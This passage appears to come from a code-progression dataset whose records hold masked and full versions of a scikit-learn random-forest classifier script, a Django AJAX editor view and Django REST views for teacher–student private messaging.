"step-4": "import pandas\nfrom sklearn.externals import joblib\nimport TrainTestProcesser\nfrom sklearn.ensemble import RandomForestClassifier\nfrom Select_OF_File import get_subdir\nimport matplotlib.pyplot as mp\nimport sklearn.model_selection as ms\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nimport numpy as np\nimport itertools\n\n\ndef main():\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n print('数据集的shape:', data_set.shape)\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n folds = TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)\n model = RandomForestClassifier(n_estimators=23)\n TrainTestProcesser.apply_SKfold(model, folds)\n TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)\n joblib.dump(model, 'RFC_model.plk')\n\n\ndef getconfusion_matrix():\n mp.rcParams['font.family'] = ['sans-serif']\n mp.rcParams['font.sans-serif'] = ['SimHei']\n classes = get_subdir('音频文件')\n data_set = pandas.read_csv('dataset.csv', index_col=False, encoding='gbk')\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x,\n dnumpy_y, test_size=0.25, random_state=7)\n model = joblib.load('RFC_model.plk')\n pred_test_y = model.predict(test_x)\n cm = confusion_matrix(test_y, pred_test_y)\n r = classification_report(test_y, pred_test_y)\n print('分类报告为:', r, sep='\\n')\n mp.figure()\n plot_confusion_matrix(cm, classes=classes, normalize=True, title=\n '随机森林分类器混淆矩阵')\n\n\ndef plot_confusion_matrix(cm, classes, normalize=False, title=\n 'Confusion matrix', cmap=mp.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print('混淆矩阵归一化')\n else:\n print('混淆矩阵未归一化')\n print('混淆矩阵为:', cm)\n mp.imshow(cm, interpolation='nearest', cmap=cmap)\n mp.title(title)\n mp.colorbar()\n tick_marks = np.arange(len(classes))\n mp.xticks(tick_marks, classes, rotation=45)\n mp.yticks(tick_marks, classes)\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.0\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n mp.text(j, i, format(cm[i, j], fmt), horizontalalignment='center',\n color='white' if cm[i, j] > thresh else 'black')\n mp.tight_layout()\n mp.ylabel('True label')\n mp.xlabel('Predicted label')\n mp.savefig('confusion_matrix_RFC.png', format='png')\n mp.show()\n\n\nif __name__ == '__main__':\n main()\n getconfusion_matrix()\n",
"step-5": "import pandas\nfrom sklearn.externals import joblib\nimport TrainTestProcesser\nfrom sklearn.ensemble import RandomForestClassifier\nfrom Select_OF_File import get_subdir\nimport matplotlib.pyplot as mp\nimport sklearn.model_selection as ms\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nimport numpy as np\nimport itertools\ndef main():\n #获取数据集\n #不使用第一列作为行索引\n data_set = pandas.read_csv(\"dataset.csv\",index_col=False,encoding='gbk')\n print(\"数据集的shape:\",data_set.shape)\n #将数据集分为特征x和标签y\n dnumpy_x,dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n #使用StratifiedKFold将数据集分为训练集和测试集\n folds= TrainTestProcesser.split_dnumpy_train_test(dnumpy_x, dnumpy_y)\n #创建模型\n model=RandomForestClassifier(n_estimators=23)\n #使用kfol交叉验证\n TrainTestProcesser.apply_SKfold(model, folds)\n #训练模型\n TrainTestProcesser.train_model(model, dnumpy_x, dnumpy_y)\n #保存模型以备将来使用\n joblib.dump(model,\"RFC_model.plk\")\n\n\n\ndef getconfusion_matrix():\n mp.rcParams['font.family'] = ['sans-serif']\n mp.rcParams['font.sans-serif'] = ['SimHei']\n classes=get_subdir(\"音频文件\")\n data_set = pandas.read_csv(\"dataset.csv\",index_col=False,encoding='gbk')\n dnumpy_x, dnumpy_y = TrainTestProcesser.split_dframe_x_y(data_set)\n train_x, test_x, train_y, test_y = ms.train_test_split(dnumpy_x, dnumpy_y, test_size=0.25, random_state=7)\n model=joblib.load(\"RFC_model.plk\")\n pred_test_y = model.predict(test_x)\n #混淆矩阵\n cm=confusion_matrix(test_y, pred_test_y)\n # 获取分类报告\n r = classification_report(test_y, pred_test_y)\n print('分类报告为:', r, sep='\\n')\n\n mp.figure()\n plot_confusion_matrix(cm, classes=classes, normalize=True,\n title='随机森林分类器混淆矩阵')\n\ndef plot_confusion_matrix(cm, classes,normalize=False,title='Confusion matrix',\n cmap=mp.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"混淆矩阵归一化\")\n else:\n print('混淆矩阵未归一化')\n\n print(\"混淆矩阵为:\",cm)\n\n mp.imshow(cm, interpolation='nearest', cmap=cmap)\n mp.title(title)\n mp.colorbar()\n tick_marks = np.arange(len(classes))\n mp.xticks(tick_marks, classes, rotation=45)\n mp.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n mp.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n mp.tight_layout()\n mp.ylabel('True label')\n mp.xlabel('Predicted label')\n mp.savefig('confusion_matrix_RFC.png', format='png')\n mp.show()\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n getconfusion_matrix()",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import JsonResponse
from django.views.generic import CreateView, UpdateView, ListView, \
DeleteView, TemplateView
from example.forms import EditorTextForm
from example.models import EdidorText
class AjaxableResponseMixin:
"""
Mixin to add AJAX support to a form.
Must be used with an object-based FormView (e.g. CreateView)
"""
def form_invalid(self, form):
response = super().form_invalid(form)
if self.request.is_ajax():
return JsonResponse(form.errors, status=400)
else:
return response
def form_valid(self, form):
# We make sure to call the parent's form_valid() method because
# it might do some processing (in the case of CreateView, it will
# call form.save() for example).
response = super().form_valid(form)
if self.request.is_ajax():
data = {
'pk': self.object.pk,
}
return JsonResponse(data)
else:
return response
class EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):
form_class = EditorTextForm
model = EditorText
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['recent_texts'] = EditorText.objects.filter(
created_by=self.request.user
)[:5]
return context
def get_object(self):
pk = self.request.POST.get('pk')
if not pk:
return None
return EdidorText.objects.get(pk=int(pk))
def form_valid(self, form):
form.instance.created_by = self.request.user
return super().form_valid(form)
def get_form_kwargs(self):
"""Return the keyword arguments for instantiating the form."""
self.object = self.get_object()
kwargs = super().get_form_kwargs()
return kwargs
|
normal
|
{
"blob_id": "87a4fcb26464925952dde57fecf4709f01e9fed7",
"index": 9916,
"step-1": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-2": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n <mask token>\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-3": "<mask token>\n\n\nclass AjaxableResponseMixin:\n <mask token>\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {'pk': self.object.pk}\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-4": "<mask token>\n\n\nclass AjaxableResponseMixin:\n \"\"\"\n Mixin to add AJAX support to a form.\n\n Must be used with an object-based FormView (e.g. CreateView)\n \"\"\"\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {'pk': self.object.pk}\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(created_by=self\n .request.user)[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-5": "from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import JsonResponse\nfrom django.views.generic import CreateView, UpdateView, ListView, \\\n DeleteView, TemplateView\n\nfrom example.forms import EditorTextForm\nfrom example.models import EdidorText\n\n\nclass AjaxableResponseMixin:\n \"\"\"\n Mixin to add AJAX support to a form.\n\n Must be used with an object-based FormView (e.g. CreateView)\n \"\"\"\n\n def form_invalid(self, form):\n response = super().form_invalid(form)\n if self.request.is_ajax():\n return JsonResponse(form.errors, status=400)\n else:\n return response\n\n def form_valid(self, form):\n # We make sure to call the parent's form_valid() method because\n # it might do some processing (in the case of CreateView, it will\n # call form.save() for example).\n response = super().form_valid(form)\n if self.request.is_ajax():\n data = {\n 'pk': self.object.pk,\n }\n return JsonResponse(data)\n else:\n return response\n\n\nclass EditorHomeView(LoginRequiredMixin, AjaxableResponseMixin, CreateView):\n form_class = EditorTextForm\n model = EditorText\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['recent_texts'] = EditorText.objects.filter(\n created_by=self.request.user\n )[:5]\n return context\n\n def get_object(self):\n pk = self.request.POST.get('pk')\n if not pk:\n return None\n return EdidorText.objects.get(pk=int(pk))\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n \"\"\"Return the keyword arguments for instantiating the form.\"\"\"\n self.object = self.get_object()\n kwargs = super().get_form_kwargs()\n return kwargs\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
from django.shortcuts import render
from django.http import HttpResponse,JsonResponse
from ex.models import Teacher,Student,Group,Report,TeamEvaluation,PrivateLetter,ChatBoxIsOpen
from django.core import serializers
from rest_framework.views import APIView
from rest_framework.response import Response
from django.contrib.auth.hashers import make_password, check_password
# from plane.models import User, Student, LightList, Light, Score, Visit
# from plane.utils.jwt_auth import create_token, get_user_id
# from django.contrib.auth.hashers import make_password, check_password
# from rest_framework.authtoken.models import Token
# from django.contrib.auth import authenticate
import os
from ex.utils.jwt_auth import create_token, get_user_id
from ex.utils.extensions.auth import JwtQueryParamAuthentication
from django.db.models import Q
# Create your views here.
class getPrivateLetterListsView(APIView):
def get(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
data_list = []
for item in ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(isOpen=1)):
msgList = []
msgList1 = []
msgList2 = []
receiver = item.receiverTea_id
identity = 0
if item.receiverStu_id != None:
receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num
identity = 1
for item2 in PrivateLetter.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=item.receiverStu_id)):
data = {
'id': item2.id,
'message': item2.message,
'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
'new': item2.new,
'Ienter': 1 # 发送
}
msgList1.append(data)
for item2 in PrivateLetter.objects.filter(Q(senderStu_id=item.receiverStu_id) & Q(receiverTea_id=user_id)):
data = {
'id': item2.id,
'message': item2.message,
'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
'new': item2.new,
'Ienter': 2 # 接收
}
msgList2.append(data)
# msgList.sort()
# print(len(msgList1))
else:
for item2 in PrivateLetter.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)):
data = {
'id': item2.id,
'message': item2.message,
'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
'new': item2.new,
'Ienter': 1 # 发送
}
msgList1.append(data)
for item2 in PrivateLetter.objects.filter(Q(senderTea_id=receiver) & Q(receiverTea_id=user_id)):
data = {
'id': item2.id,
'message': item2.message,
'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
'new': item2.new,
'Ienter': 2 # 接收
}
msgList2.append(data)
# msgList.sort()
len1 = len(msgList1)
len2 = len(msgList2)
i1 = 0
i2 = 0
for i in range(0,len1 + len2):
if i1 >= len1:
msgList.append(msgList2[i2])
i2+=1
elif i2 >= len2:
msgList.append(msgList1[i1])
i1+=1
elif msgList1[i1]['time'] < msgList2[i2]['time']:
msgList.append(msgList1[i1])
i1+=1
else:
msgList.append(msgList2[i2])
i2+=1
# print(msgList)
data = {
'id': item.id,
'receiver': receiver,
'msgList': msgList,
'name': receiver + str(identity),
'identity': identity
}
data_list.append(data)
# print(data_list)
return Response({
'status': 200,
'msg': '返回成功',
'data': data_list
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
class enterPrivateLetterView(APIView):
def post(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
receiver = request.data.get('receiver')
message = request.data.get('message')
identity = request.data.get('identity')
if identity == 0:
privateLetter = PrivateLetter(senderTea_id=user_id,receiverTea_id=receiver,message=message)
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=receiver)&Q(receiverTea_id=user_id)).first()
if not chatBoxIsOpen:
chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,receiverTea_id=user_id)
else:
receiverStu_id = Student.objects.filter(stu_num=receiver).first().id
privateLetter = PrivateLetter(senderTea_id=user_id,receiverStu_id=receiverStu_id,message=message)
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=receiverStu_id)&Q(receiverTea_id=user_id)).first()
if not chatBoxIsOpen:
chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=receiverStu_id,receiverTea_id=user_id)
privateLetter.save()
chatBoxIsOpen.save()
return Response({
'status': 200,
'msg': '发布私信成功',
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
# 获取最近联系人
class getRecentContactsView(APIView):
def get(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
data_list = []
for item in PrivateLetter.objects.filter(senderTea_id=user_id):
if item.receiverTea_id != None and item.receiverTea_id != "":
identity = 0
receiver = item.receiverTea_id
else:
identity = 1
receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num
# print(((receiver + str(identity)) not in dict))
# if (receiver + str(identity)) not in dict:
# dict[receiver + str(identity)] = '1'
data = {
# 'id': item.id,
'receiver': receiver,
'identity': identity #老师:0;学生:1
}
data_list.append(data)
for item in PrivateLetter.objects.filter(receiverTea_id=user_id):
if item.senderTea_id != None and item.senderTea_id != "":
identity = 0
receiver = item.senderTea_id
else:
identity = 1
receiver = Student.objects.filter(id=item.senderStu_id).first().stu_num
# print(((receiver + str(identity)) not in dict))
# if (receiver + str(identity)) not in dict:
# dict[receiver + str(identity)] = '1'
data = {
# 'id': item.id,
'receiver': receiver,
'identity': identity #老师:0;学生:1
}
data_list.append(data)
lenData = len(data_list)
dict = {}
data_list1 = []
for i in range(lenData - 1,-1,-1):
if (data_list[i]['receiver'] + str(data_list[i]['identity'])) not in dict:
dict[data_list[i]['receiver'] + str(data_list[i]['identity'])] = '1'
data_list1.append(data_list[i])
# lenData = len(data_list1)
# if lenData > 10:
# data_list1 = data_list1[lenData - 10:lenData]
return Response({
'status': 200,
'msg': '返回成功',
'data': data_list1
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
# 关闭聊天框
class closeChatBoxView(APIView):
def post(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
receiver = request.data.get('receiver')
iden = request.data.get('iden')
if iden == 0:
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)).first()
else:
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=Student.objects.filter(stu_num=receiver).first().id)).first()
chatBoxIsOpen.delete()
return Response({
'status': 200,
'msg': '返回成功',
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
# 打开聊天框
class openChatBoxView(APIView):
def post(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
receiver = request.data.get('receiver')
identity = request.data.get('identity')
if identity == 0:
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverTea_id=receiver)).first()
if not chatBoxIsOpen:
chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,receiverTea_id=receiver)
else:
receiverStu_id = Student.objects.filter(stu_num=receiver).first().id
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=user_id) & Q(receiverStu_id=receiverStu_id)).first()
if not chatBoxIsOpen:
chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,receiverStu_id=receiverStu_id)
chatBoxIsOpen.save()
return Response({
'status': 200,
'msg': '返回成功',
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
# 搜索联系人
class searchContactView(APIView):
def get(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
receiver = request.GET['receiver']
identity = request.GET['identity']
# print(receiver,identity=='0')
# user = Teacher.objects.filter(id=username).first()
iden = 4
if identity == '0' and user_id == receiver:
iden = 3
elif identity == '0':
user = Teacher.objects.filter(id=receiver).first()
if not user:
iden = 4
else:
iden = 0
else:
user = Student.objects.filter(stu_num=receiver).first()
if not user:
iden = 4
else:
iden = 1
data = {
'identity': iden,
'receiver': receiver
}
return Response({
'status': 200,
'msg': '返回成功',
'data': data
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
class stuGetPrivateLetterListsView(APIView):
def get(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
username = payload['username']
# print(user_id,username)
data_list = []
for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(isOpen=1)):
msgList = []
msgList1 = []
msgList2 = []
receiver = item.receiverTea_id
identity = 0
if item.receiverStu_id != None:
receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num
identity = 1
for item2 in PrivateLetter.objects.filter(Q(senderStu_id=user_id) & Q(receiverStu_id=item.receiverStu_id)):
data = {
'id': item2.id,
'message': item2.message,
'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
'new': item2.new,
'Ienter': 1 # 发送
}
msgList1.append(data)
for item2 in PrivateLetter.objects.filter(Q(senderStu_id=item.receiverStu_id) & Q(receiverStu_id=user_id)):
data = {
'id': item2.id,
'message': item2.message,
'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
'new': item2.new,
'Ienter': 2 # 接收
}
msgList2.append(data)
# msgList.sort()
# print(len(msgList1))
else:
for item2 in PrivateLetter.objects.filter(Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)):
data = {
'id': item2.id,
'message': item2.message,
'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
'new': item2.new,
'Ienter': 1 # 发送
}
msgList1.append(data)
for item2 in PrivateLetter.objects.filter(Q(senderTea_id=receiver) & Q(receiverStu_id=user_id)):
data = {
'id': item2.id,
'message': item2.message,
'time': str(item2.time.strftime('%Y-%m-%d %H:%M:%S')),
'new': item2.new,
'Ienter': 2 # 接收
}
msgList2.append(data)
# msgList.sort()
len1 = len(msgList1)
len2 = len(msgList2)
i1 = 0
i2 = 0
for i in range(0,len1 + len2):
if i1 >= len1:
msgList.append(msgList2[i2])
i2+=1
elif i2 >= len2:
msgList.append(msgList1[i1])
i1+=1
elif msgList1[i1]['time'] < msgList2[i2]['time']:
msgList.append(msgList1[i1])
i1+=1
else:
msgList.append(msgList2[i2])
i2+=1
# print(msgList)
data = {
'id': item.id,
'receiver': receiver,
'msgList': msgList,
'name': receiver + str(identity),
'identity': identity
}
data_list.append(data)
# print(data_list)
return Response({
'status': 200,
'msg': '返回成功',
'data': data_list
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
class stuEnterPrivateLetterView(APIView):
def post(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
username = payload['username']
# print(user_id,username)
receiver = request.data.get('receiver')
message = request.data.get('message')
identity = request.data.get('identity')
if identity == 0:
privateLetter = PrivateLetter(senderStu_id=user_id,receiverTea_id=receiver,message=message)
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id=receiver)&Q(receiverStu_id=user_id)).first()
if not chatBoxIsOpen:
chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,receiverStu_id=user_id)
else:
receiverStu_id = Student.objects.filter(stu_num=receiver).first().id
privateLetter = PrivateLetter(senderStu_id=user_id,receiverStu_id=receiverStu_id,message=message)
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=receiverStu_id)&Q(receiverStu_id=user_id)).first()
if not chatBoxIsOpen:
chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=receiverStu_id,receiverStu_id=user_id)
privateLetter.save()
chatBoxIsOpen.save()
return Response({
'status': 200,
'msg': '发布私信成功',
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
# 获取最近联系人
class stuRecentContactsView(APIView):
def get(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
data_list = []
for item in PrivateLetter.objects.filter(senderStu_id=user_id):
if item.receiverTea_id != None and item.receiverTea_id != "":
identity = 0
receiver = item.receiverTea_id
else:
identity = 1
receiver = Student.objects.filter(id=item.receiverStu_id).first().stu_num
data = {
'receiver': receiver,
'identity': identity #老师:0;学生:1
}
data_list.append(data)
for item in PrivateLetter.objects.filter(receiverStu_id=user_id):
if item.senderTea_id != None and item.senderTea_id != "":
identity = 0
receiver = item.senderTea_id
else:
identity = 1
receiver = Student.objects.filter(id=item.senderStu_id).first().stu_num
data = {
'receiver': receiver,
'identity': identity #老师:0;学生:1
}
data_list.append(data)
lenData = len(data_list)
dict = {}
data_list1 = []
for i in range(lenData - 1,-1,-1):
if (data_list[i]['receiver'] + str(data_list[i]['identity'])) not in dict:
dict[data_list[i]['receiver'] + str(data_list[i]['identity'])] = '1'
data_list1.append(data_list[i])
return Response({
'status': 200,
'msg': '返回成功',
'data': data_list1
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
# 关闭聊天框
class stuCloseChatBoxView(APIView):
def post(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
receiver = request.data.get('receiver')
iden = request.data.get('iden')
if iden == 0:
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)).first()
else:
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverStu_id=Student.objects.filter(stu_num=receiver).first().id)).first()
chatBoxIsOpen.delete()
return Response({
'status': 200,
'msg': '返回成功',
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
# 打开聊天框
class stuOpenChatBoxView(APIView):
def post(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
receiver = request.data.get('receiver')
identity = request.data.get('identity')
if identity == 0:
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverTea_id=receiver)).first()
if not chatBoxIsOpen:
chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,receiverTea_id=receiver)
else:
receiverStu_id = Student.objects.filter(stu_num=receiver).first().id
chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id) & Q(receiverStu_id=receiverStu_id)).first()
if not chatBoxIsOpen:
chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,receiverStu_id=receiverStu_id)
chatBoxIsOpen.save()
return Response({
'status': 200,
'msg': '返回成功',
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
# 搜索联系人
class stuSearchContactView(APIView):
def get(self, request, *args, **kwargs):
try:
try:
payload = JwtQueryParamAuthentication.authenticate(self, request)[0]
except Exception as e:
return Response({
'status': 403,
'msg': '未登录',
'err': e.args
})
user_id = payload['id']
username = payload['username']
receiver = request.GET['receiver']
identity = request.GET['identity']
# print(receiver,identity=='0')
# user = Teacher.objects.filter(id=username).first()
# 0:教师,1:学生,2:还未搜索,3:自己,4:用户不存在
iden = 4
if identity == '1' and username == receiver:
iden = 3
elif identity == '0':
user = Teacher.objects.filter(id=receiver).first()
if not user:
iden = 4
else:
iden = 0
else:
user = Student.objects.filter(stu_num=receiver).first()
if not user:
iden = 4
else:
iden = 1
data = {
'identity': iden,
'receiver': receiver
}
return Response({
'status': 200,
'msg': '返回成功',
'data': data
})
except Exception as e:
return Response({
'status': 204,
'msg': '遇到了异常错误',
'err': e.args
})
|
normal
|
{
"blob_id": "4b5794ff79371c2e49c5d2b621805b08c4ff7acb",
"index": 8898,
"step-1": "<mask token>\n\n\nclass searchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '0' and user_id == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuGetPrivateLetterListsView(APIView):\n\n def get(self, request, *args, **kwargs):\n 